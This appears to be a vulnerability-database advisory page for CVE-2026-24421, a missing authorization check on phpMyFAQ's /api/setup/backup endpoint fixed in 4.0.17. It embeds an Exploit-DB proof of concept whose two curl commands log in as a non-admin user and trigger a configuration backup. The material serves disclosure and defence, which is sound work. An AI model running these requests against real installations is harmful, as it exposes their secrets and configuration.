CVE-2026-24421

unknown

Published 2026-01-23 · Modified 2026-02-03

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing)

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52523 webapps php text · 2 KB

contact · 2026-04-29

phpMyFAQ 4.0.16 - Improper Authorization

text exploit Source: Exploit-DB

# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization 
# Google Dork: N/A
# Date: 2026-01-23
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.phpmyfaq.de/
# Software Link: https://www.phpmyfaq.de/download/
# Version: <= 4.0.16 (REQUIRED)
# Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x
# CVE: CVE-2026-24421

## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.

## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.

## PoC
Precondition: API enabled, any authenticated non-admin user.

1) Log in as a non-admin user:
curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login

2) Trigger backup generation:
curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup

## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.

## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.

## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7g

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	phpmyfaq/phpmyfaq	`<4.0.17`	`4.0.17`
Packagist	thorsten/phpmyfaq	`<4.0.17`	`4.0.17`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.